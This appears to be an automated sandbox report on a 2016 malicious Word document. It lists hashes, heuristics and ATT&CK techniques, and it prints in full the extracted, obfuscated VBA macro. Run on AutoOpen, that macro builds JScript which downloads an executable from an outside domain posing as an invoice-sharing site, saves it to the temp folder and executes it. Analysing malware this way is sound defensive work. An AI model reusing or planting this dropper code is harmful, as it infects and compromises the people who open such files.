Office (OLE) malware analysis — malicious · 12f50f9fff82ccf7

MALICIOUS

Office (OLE)

120.5 KB Created: 2016-11-16 16:01:00 Authoring application: Microsoft Office Word First seen: 2016-12-03

MD5: 22c206aab75595d605957e619020be2e SHA-1: 1d29315d7d7c5756532d7fae0b8dcff897d2fed1 SHA-256: 12f50f9fff82ccf7c1fe68dff0a2c64a0f743563af13b499d643d00145aec094

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The macros utilize CreateObject to instantiate and execute JavaScript, which is heavily obfuscated. This script is likely responsible for downloading and executing a secondary payload, as indicated by the ClamAV detection name 'Doc.Dropper.Agent-1850693'. The AutoOpen macro further suggests an immediate execution upon opening.

Heuristics 7

ClamAV: Doc.Dropper.Agent-1850693 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-1850693
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

ynivra5 = gkitsaw & waqga & ejlaxzak & endixsoke3 & qtytitp & ykymh & nivush & ipifi & iddepo & uzirret
Set notwidb = CreateObject(ynivra5)
notwidb.Language = vhyca

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Sub
Sub AutoOpen()
bavmohfyzxo
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8093 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8093 bytes
SHA-256: `a56dc2ca98fe5773ef8197ff8cd35d7a3fa8271fdd3013562698806e698bb506`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub bavmohfyzxo() Dim gkitsaw, ipifi, ynivra5, uvahryb, ejlaxzak, qtytitp, nivush, uzirret, unigir, iddepo, endixsoke3, odemf, waqga Dim uryrnitk9 Dim ykymh ipifi = "tCo" unigir = "JScrip" waqga = "cri" uzirret = "ol" ejlaxzak = "ptC" ykymh = ".Sc" odemf = "t" nivush = "rip" gkitsaw = "MSS" uvahryb = "lol" qtytitp = "rol" endixsoke3 = "ont" iddepo = "ntr" alperesr = Array("ozku0", "558", "xcyq5", "605", "646", "632", "funct", "efke7", "756")(6) & Array("ugsy0", "wy6", "ion l", "553", "499", "tfu1", "yv7")(2) & Array("ol ()", "752", "619", "705", "et3", "modq6", "461", "620", "yzc0")(0) & Array("uwf2", "865", "idy4", " {var", "611")(3) & Array("eg3", " shel", "842", "uwy4", "816", "499", "670", "607")(1) & Array("unzu6", "407", "co6", "l = n", "egi7", "ete8")(3) & Array("674", "850", "kgy0", "czarx3", "ew Ac", "kja0", "lxej5")(4) & Array("823", "tiveX", "mno4", "zy7")(1) & Array("Objec", "780", "iju7", "468")(0) & Array("t (""W", "573", "412", "mawb7")(0) kfore = Array("Scrip", "sawj4", "xryr7", "ko0", "570", "og3", "856")(0) & Array("777", "876", "542", "t.She", "edr9")(3) & Array("ll"");", "yx0", "acg2", "897", "yp2")(0) & Array("404", "726", "400", "var f", "657", "urz9")(3) & Array("so = ", "604", "455", "ubbe6", "522")(0) & Array("421", "813", "ux7", "new A")(3) & Array("fo1", "ctive", "og2", "ujt6", "894", "ubxi1", "733", "894", "urbu4")(1) & Array("XObje", "546", "807", "nwow5", "hyf3", "mjikr9", "690")(0) & Array("861", "utu4", "415", "471", "753", "ct (""")(5) & Array("yxi0", "pyl8", "504", "Scrip")(3) calun5 = Array("yfe9", "465", "416", "igf4", "ting.")(4) & Array("702", "641", "FileS", "682", "knorv3", "njafk1", "uwf1", "831")(2) & Array("adb0", "ngyl3", "adb0", "628", "ew5", "amxu0", "743", "ystem")(7) & Array("463", "ihk8", "ma0", "Objec", "ix9", "741")(3) & Array("584", "t"");v", "itw3", "519", "801", "884", "ydze2", "on0", "548")(1) & Array("lsy6", "do4", "ahe3", "rda6", "ar tm")(4) & Array("642", "equ9", "p_pat", "or8", "869", "609", "oj8", "rru0", "cka3")(2) & Array("h = f", "822", "871", "xig0")(0) & Array("830", "so.Ge", "761", "vhy2")(1) & Array("tSpec", "627", "447", "ijh2", "ukpa1")(0) tynpu5 = Array("ykj0", "ialFo", "ulu9", "442", "652")(1) & Array("duk0", "yp3", "494", "677", "kgus5", "lder(", "675", "758")(5) & Array("403", " 2) +", "rze2", "641", "563", "576", "esu0", "807")(1) & Array("hfi2", "476", " ""\\""", "559", "643", "gruw0", "eno0")(2) & Array("im5", " + fs", "qvub5", "509", "570", "884", "595", "850")(1) & Array("uqb0", "657", "o.Get", "xe9", "ane1", "uvmy0", "582", "ygz2", "tjumh2")(2) & Array("xli0", "TempN", "fnom8", "560", "710", "697", "403")(1) & Array("723", "rqa1", "ame()", "padl2")(2) & Array("omr8", "843", "863", "478", ";var ", "vlorf8", "549", "749", "724")(4) & Array("pum2", "strea", "637", "870", "476")(1) hgebofu = Array("pi7", "are0", "an6", "799", "716", "hjy0", "exu4", "m = n")(7) & Array("ja1", "ew Ac", "ocka9", "ut3")(1) & Array("tiveX", "ratz0", "413", "884", "qbox9", "isi9", "499")(0) & Array("415", "ug7", "ika0", "Objec")(3) & Array("as5", "878", "dme2", "627", "t (""A")(4) & Array("529", "841", "zviw4", "703", "hko4", "DODB.")(5) & Array("as3", "712", "899", "cym1", "iq8", "rsy7", "aca9", "Strea", "ymk1")(7) & Array("744", "uc3", "obqo4", "inku0", "m"");s")(4) & Array("675", "885", "650", "486", "jwaxs6", "590", "687", "tream")(7) & Array(".Open", "498", "kma3", "jevq5", "ura3", "857", "583", "521", "421")(0) yplidk = Array("iwq0", "531", "jfow6", "no4", "umy7", "793", "534", "();st", "uba5")(7) & Array("484", "649", "izb1", "ream.", "xwi2", "575", "ag6")(3) & Array("se4", "415", "431", "453", "797", "lu4", "Type ", "418", "ufl8")(6) & Array("838", "= 1;s", "czuh6", "ybl0", "890")(1) & Array("zu5", "691", "tream", "862", "ifte1", "634")(2) & Array(".Posi", "650", "668", "660")(0) & Array("ux0", "tion ", "wy7", "436", "748", "755", "522", "fecl2", "twitr8")(1) & Array("755", "cdiwl9", "= 0; ", "872", "ode1", "739", "795")(2) & Array("776", "bgy1", "aczo6", "448", "var a", "548")(4) & Array("407", "ss = ", "456", "882", "svu0", "voxp5")(1) qrihko = Array("ykzy5", "859", "641", "ofi2", "ixzi5", "new A", "uvf0")(5) & Array("744", "begq0", "625", "595", "895", "ctive", "720", "460")(5) & Array("adty9", "768", "844", "XObje", "fuq8", "847", "wevt1")(3) & Array("747", "449", "425", "ct(""M", "428", "fly8", "522", "exi9", "qhi0")(3) & Array("vjos5", "vsurg8", "610", "icros", "ax4", "icte1")(3) & Array("ghe1", "xuz7", "ohco3", "ilva0", "608", "oft.X", "514")(5) & Array("716", "nrojk9", "836", "MLHTT", "517")(3) & Array("iz5", "zy9", "gotv2", "yv5", "473", "P"");a", "bputr7", "opb5")(5) & Array("ypri6", "ifa1", "mgywn0", "848", "bu6", "ss.op")(5) & Array("en(""G", "673", "570", "622", "vo0", "766", "551", "ahe3")(0) qivaba3 = Array("836", "ET"", ", "ol6", "kiks5", "416")(1) & Array("466", "717", "756", """http")(3) & Array("wfas8", "547", "zlem2", "822", "747", "://do", "775", "598", "495")(5) & Array("428", "528", "838", "ywo0", "c.inv")(4) & Array("795", "785", "aw5", "gtu5", "oice-")(4) & Array("724", "bwa9", "share", "796")(2) & Array("point", "611", "bes9", "pe6", "430", "wufn8", "881", "797", "845")(0) & Array("743", "400", ".com/", "780", "yp0")(2) & Array("ipz8", "lwybn2", "offic", "843")(2) & Array("565", "ni1", "mij4", "880", "cja0", "e/upd", "402", "ego6", "opa9")(5) kxexfyvji1 = Array("400", "440", "497", "ates.", "gsy0", "516", "580", "823")(3) & Array("pxu4", "exe"",", "406", "766", "631", "wyt8", "896", "uqlu4", "576")(1) & Array(" 0);a", "aho3", "507", "yvl9", "ox0", "aqw4")(0) & Array("ss.se", "hy0", "849", "co6", "493", "ism4", "575", "oz8")(0) & Array("dmyb5", "yl6", "857", "674", "846", "nd();")(5) & Array("kih2", "qse2", "isq6", "wne8", "683", "strea", "709", "vo1")(5) & Array("710", "m.Wri", "684", "iwe4", "ebi6", "430")(1) & Array("iwqa5", "iqry8", "te(as", "718", "kke5")(2) & Array("564", "677", "iw2", "s.Res", "rho5", "527")(3) & Array("759", "684", "ponse", "ijre0")(2) suczu1 = Array("807", "hkebt0", "836", "bni0", "ol3", "Body)", "835", "750")(5) & Array("789", "744", "488", "538", "577", ";stre", "xmymc3")(5) & Array("qha4", "am.Sa", "gunf1", "438")(1) & Array("veToF", "yfe2", "qe6", "ony0")(0) & Array("671", "gha1", "ile(t", "493", "675", "an7")(2) & Array("ik8", "mp_pa", "ozmy2", "456", "nyq0", "de4", "gitc6", "411")(1) & Array("601", "735", "pqult0", "by4", "633", "th);s", "626", "595")(5) & Array("705", "676", "805", "pizg0", "uk1", "tream")(5) & Array("562", "vlar9", "fzyf9", "osu0", "iddi5", "825", "883", ".Clos", "umpa7")(7) & Array("789", "600", "437", "899", "760", "e();v")(5) uxohidju = Array("ibqo8", "452", "604", "li5", "ar cm", "790")(4) & Array("zco9", "evwo2", "dfu6", "ci2", "482", "565", "drun ", "761", "817")(6) & Array("611", "865", "= ""cm", "611", "ig1", "oka3", "ad2")(2) & Array("uf2", "556", "693", "d.exe", "ha0")(3) & Array("752", "508", " /c """, "493", "yzj0", "ylgi0")(2) & Array(" + tm", "408", "576", "665", "461", "yle2", "524", "az0")(0) & Array("851", "p_pat", "yq4", "403", "nvebn0", "ubo1", "852", "506", "568")(1) & Array("cnock0", "yjz7", "uf8", "h; sh", "630")(3) & Array("431", "428", "ell.r", "554")(2) & Array("708", "449", "629", "yd4", "un(cm", "586", "708")(4) jukidef1 = Array("402", "aja3", "inze1", "723", "724", "qo7", "drun,")(6) & Array("ymg6", "ect5", "844", "rkizc4", " 0);}", "ybi8", "444")(4) uryrnitk9 = uvahryb vhyca = unigir & odemf ynivra5 = gkitsaw & waqga & ejlaxzak & endixsoke3 & qtytitp & ykymh & nivush & ipifi & iddepo & uzirret Set notwidb = CreateObject(ynivra5) notwidb.Language = vhyca notwidb.AddCode (alperesr & kfore & calun5 & tynpu5 & hgebofu & yplidk & qrihko & qivaba3 & kxexfyvji1 & suczu1 & uxohidju & jukidef1) notwidb.Run (uryrnitk9) End Sub Sub AutoOpen() bavmohfyzxo End Sub

SHA-256: a56dc2ca98fe5773ef8197ff8cd35d7a3fa8271fdd3013562698806e698bb506

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub bavmohfyzxo()
Dim gkitsaw, ipifi, ynivra5, uvahryb, ejlaxzak, qtytitp, nivush, uzirret, unigir, iddepo, endixsoke3, odemf, waqga
Dim uryrnitk9
Dim ykymh
ipifi = "tCo"
unigir = "JScrip"
waqga = "cri"
uzirret = "ol"
ejlaxzak = "ptC"
ykymh = ".Sc"
odemf = "t"
nivush = "rip"
gkitsaw = "MSS"
uvahryb = "lol"
qtytitp = "rol"
endixsoke3 = "ont"
iddepo = "ntr"
alperesr = Array("ozku0", "558", "xcyq5", "605", "646", "632", "funct", "efke7", "756")(6) & Array("ugsy0", "wy6", "ion l", "553", "499", "tfu1", "yv7")(2) & Array("ol ()", "752", "619", "705", "et3", "modq6", "461", "620", "yzc0")(0) & Array("uwf2", "865", "idy4", " {var", "611")(3) & Array("eg3", " shel", "842", "uwy4", "816", "499", "670", "607")(1) & Array("unzu6", "407", "co6", "l = n", "egi7", "ete8")(3) & Array("674", "850", "kgy0", "czarx3", "ew Ac", "kja0", "lxej5")(4) & Array("823", "tiveX", "mno4", "zy7")(1) & Array("Objec", "780", "iju7", "468")(0) & Array("t (""W", "573", "412", "mawb7")(0)
kfore = Array("Scrip", "sawj4", "xryr7", "ko0", "570", "og3", "856")(0) & Array("777", "876", "542", "t.She", "edr9")(3) & Array("ll"");", "yx0", "acg2", "897", "yp2")(0) & Array("404", "726", "400", "var f", "657", "urz9")(3) & Array("so = ", "604", "455", "ubbe6", "522")(0) & Array("421", "813", "ux7", "new A")(3) & Array("fo1", "ctive", "og2", "ujt6", "894", "ubxi1", "733", "894", "urbu4")(1) & Array("XObje", "546", "807", "nwow5", "hyf3", "mjikr9", "690")(0) & Array("861", "utu4", "415", "471", "753", "ct (""")(5) & Array("yxi0", "pyl8", "504", "Scrip")(3)
calun5 = Array("yfe9", "465", "416", "igf4", "ting.")(4) & Array("702", "641", "FileS", "682", "knorv3", "njafk1", "uwf1", "831")(2) & Array("adb0", "ngyl3", "adb0", "628", "ew5", "amxu0", "743", "ystem")(7) & Array("463", "ihk8", "ma0", "Objec", "ix9", "741")(3) & Array("584", "t"");v", "itw3", "519", "801", "884", "ydze2", "on0", "548")(1) & Array("lsy6", "do4", "ahe3", "rda6", "ar tm")(4) & Array("642", "equ9", "p_pat", "or8", "869", "609", "oj8", "rru0", "cka3")(2) & Array("h = f", "822", "871", "xig0")(0) & Array("830", "so.Ge", "761", "vhy2")(1) & Array("tSpec", "627", "447", "ijh2", "ukpa1")(0)
tynpu5 = Array("ykj0", "ialFo", "ulu9", "442", "652")(1) & Array("duk0", "yp3", "494", "677", "kgus5", "lder(", "675", "758")(5) & Array("403", " 2) +", "rze2", "641", "563", "576", "esu0", "807")(1) & Array("hfi2", "476", " ""\\""", "559", "643", "gruw0", "eno0")(2) & Array("im5", " + fs", "qvub5", "509", "570", "884", "595", "850")(1) & Array("uqb0", "657", "o.Get", "xe9", "ane1", "uvmy0", "582", "ygz2", "tjumh2")(2) & Array("xli0", "TempN", "fnom8", "560", "710", "697", "403")(1) & Array("723", "rqa1", "ame()", "padl2")(2) & Array("omr8", "843", "863", "478", ";var ", "vlorf8", "549", "749", "724")(4) & Array("pum2", "strea", "637", "870", "476")(1)
hgebofu = Array("pi7", "are0", "an6", "799", "716", "hjy0", "exu4", "m = n")(7) & Array("ja1", "ew Ac", "ocka9", "ut3")(1) & Array("tiveX", "ratz0", "413", "884", "qbox9", "isi9", "499")(0) & Array("415", "ug7", "ika0", "Objec")(3) & Array("as5", "878", "dme2", "627", "t (""A")(4) & Array("529", "841", "zviw4", "703", "hko4", "DODB.")(5) & Array("as3", "712", "899", "cym1", "iq8", "rsy7", "aca9", "Strea", "ymk1")(7) & Array("744", "uc3", "obqo4", "inku0", "m"");s")(4) & Array("675", "885", "650", "486", "jwaxs6", "590", "687", "tream")(7) & Array(".Open", "498", "kma3", "jevq5", "ura3", "857", "583", "521", "421")(0)
yplidk = Array("iwq0", "531", "jfow6", "no4", "umy7", "793", "534", "();st", "uba5")(7) & Array("484", "649", "izb1", "ream.", "xwi2", "575", "ag6")(3) & Array("se4", "415", "431", "453", "797", "lu4", "Type ", "418", "ufl8")(6) & Array("838", "= 1;s", "czuh6", "ybl0", "890")(1) & Array("zu5", "691", "tream", "862", "ifte1", "634")(2) & Array(".Posi", "650", "668", "660")(0) & Array("ux0", "tion ", "wy7", "436", "748", "755", "522", "fecl2", "twitr8")(1) & Array("755", "cdiwl9", "= 0; ", "872", "ode1", "739", "795")(2) & Array("776", "bgy1", "aczo6", "448", "var a", "548")(4) & Array("407", "ss = ", "456", "882", "svu0", "voxp5")(1)
qrihko = Array("ykzy5", "859", "641", "ofi2", "ixzi5", "new A", "uvf0")(5) & Array("744", "begq0", "625", "595", "895", "ctive", "720", "460")(5) & Array("adty9", "768", "844", "XObje", "fuq8", "847", "wevt1")(3) & Array("747", "449", "425", "ct(""M", "428", "fly8", "522", "exi9", "qhi0")(3) & Array("vjos5", "vsurg8", "610", "icros", "ax4", "icte1")(3) & Array("ghe1", "xuz7", "ohco3", "ilva0", "608", "oft.X", "514")(5) & Array("716", "nrojk9", "836", "MLHTT", "517")(3) & Array("iz5", "zy9", "gotv2", "yv5", "473", "P"");a", "bputr7", "opb5")(5) & Array("ypri6", "ifa1", "mgywn0", "848", "bu6", "ss.op")(5) & Array("en(""G", "673", "570", "622", "vo0", "766", "551", "ahe3")(0)
qivaba3 = Array("836", "ET"", ", "ol6", "kiks5", "416")(1) & Array("466", "717", "756", """http")(3) & Array("wfas8", "547", "zlem2", "822", "747", "://do", "775", "598", "495")(5) & Array("428", "528", "838", "ywo0", "c.inv")(4) & Array("795", "785", "aw5", "gtu5", "oice-")(4) & Array("724", "bwa9", "share", "796")(2) & Array("point", "611", "bes9", "pe6", "430", "wufn8", "881", "797", "845")(0) & Array("743", "400", ".com/", "780", "yp0")(2) & Array("ipz8", "lwybn2", "offic", "843")(2) & Array("565", "ni1", "mij4", "880", "cja0", "e/upd", "402", "ego6", "opa9")(5)
kxexfyvji1 = Array("400", "440", "497", "ates.", "gsy0", "516", "580", "823")(3) & Array("pxu4", "exe"",", "406", "766", "631", "wyt8", "896", "uqlu4", "576")(1) & Array(" 0);a", "aho3", "507", "yvl9", "ox0", "aqw4")(0) & Array("ss.se", "hy0", "849", "co6", "493", "ism4", "575", "oz8")(0) & Array("dmyb5", "yl6", "857", "674", "846", "nd();")(5) & Array("kih2", "qse2", "isq6", "wne8", "683", "strea", "709", "vo1")(5) & Array("710", "m.Wri", "684", "iwe4", "ebi6", "430")(1) & Array("iwqa5", "iqry8", "te(as", "718", "kke5")(2) & Array("564", "677", "iw2", "s.Res", "rho5", "527")(3) & Array("759", "684", "ponse", "ijre0")(2)
suczu1 = Array("807", "hkebt0", "836", "bni0", "ol3", "Body)", "835", "750")(5) & Array("789", "744", "488", "538", "577", ";stre", "xmymc3")(5) & Array("qha4", "am.Sa", "gunf1", "438")(1) & Array("veToF", "yfe2", "qe6", "ony0")(0) & Array("671", "gha1", "ile(t", "493", "675", "an7")(2) & Array("ik8", "mp_pa", "ozmy2", "456", "nyq0", "de4", "gitc6", "411")(1) & Array("601", "735", "pqult0", "by4", "633", "th);s", "626", "595")(5) & Array("705", "676", "805", "pizg0", "uk1", "tream")(5) & Array("562", "vlar9", "fzyf9", "osu0", "iddi5", "825", "883", ".Clos", "umpa7")(7) & Array("789", "600", "437", "899", "760", "e();v")(5)
uxohidju = Array("ibqo8", "452", "604", "li5", "ar cm", "790")(4) & Array("zco9", "evwo2", "dfu6", "ci2", "482", "565", "drun ", "761", "817")(6) & Array("611", "865", "= ""cm", "611", "ig1", "oka3", "ad2")(2) & Array("uf2", "556", "693", "d.exe", "ha0")(3) & Array("752", "508", " /c """, "493", "yzj0", "ylgi0")(2) & Array(" + tm", "408", "576", "665", "461", "yle2", "524", "az0")(0) & Array("851", "p_pat", "yq4", "403", "nvebn0", "ubo1", "852", "506", "568")(1) & Array("cnock0", "yjz7", "uf8", "h; sh", "630")(3) & Array("431", "428", "ell.r", "554")(2) & Array("708", "449", "629", "yd4", "un(cm", "586", "708")(4)
jukidef1 = Array("402", "aja3", "inze1", "723", "724", "qo7", "drun,")(6) & Array("ymg6", "ect5", "844", "rkizc4", " 0);}", "ybi8", "444")(4)
uryrnitk9 = uvahryb
vhyca = unigir & odemf
ynivra5 = gkitsaw & waqga & ejlaxzak & endixsoke3 & qtytitp & ykymh & nivush & ipifi & iddepo & uzirret
Set notwidb = CreateObject(ynivra5)
notwidb.Language = vhyca
notwidb.AddCode (alperesr & kfore & calun5 & tynpu5 & hgebofu & yplidk & qrihko & qivaba3 & kxexfyvji1 & suczu1 & uxohidju & jukidef1)
notwidb.Run (uryrnitk9)


End Sub
Sub AutoOpen()
bavmohfyzxo
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.